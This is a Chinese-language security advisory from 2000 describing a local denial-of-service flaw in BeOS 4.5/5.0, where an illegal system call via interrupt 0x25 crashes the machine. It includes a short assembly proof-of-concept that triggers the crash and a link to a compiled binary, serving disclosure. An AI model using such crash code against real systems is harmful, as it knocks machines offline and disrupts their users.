BeOS 4.5/5.0非法系统调用漏洞发布时间:2000-04-12 更新时间:2000-04-12 严重程度:中 威胁程度:本地拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 BeOS 4.5/5.0详细描述 一个通过0x25中断包含非法参数的直接系统调用会导致BeOS 系统崩溃,并且必须重新启动机器才能继续使用。 测试代码 下面是一个能使BeOS系统崩溃的ASM程序:section .text global _start _start: push dword msg push dword len push dword 1 ;stdout mov eax,3 ;sys_write int 0x25 ;must be a *call* to int 0x25, ;then everything goes ok; i.e. ;return address must be on the stack, ;but it is not mov eax,0x3f ;sys_exit int 0x25 msg db "hello",0xa len equ $ - msg 大家可以到下面的站点获得两进制文件: http://linuxassembly.org/BeDie.tgz 并在这里推荐一个有关LINUX ASM编程的站点: http://linuxassembly.org 解决方案 暂无 相关信息 |
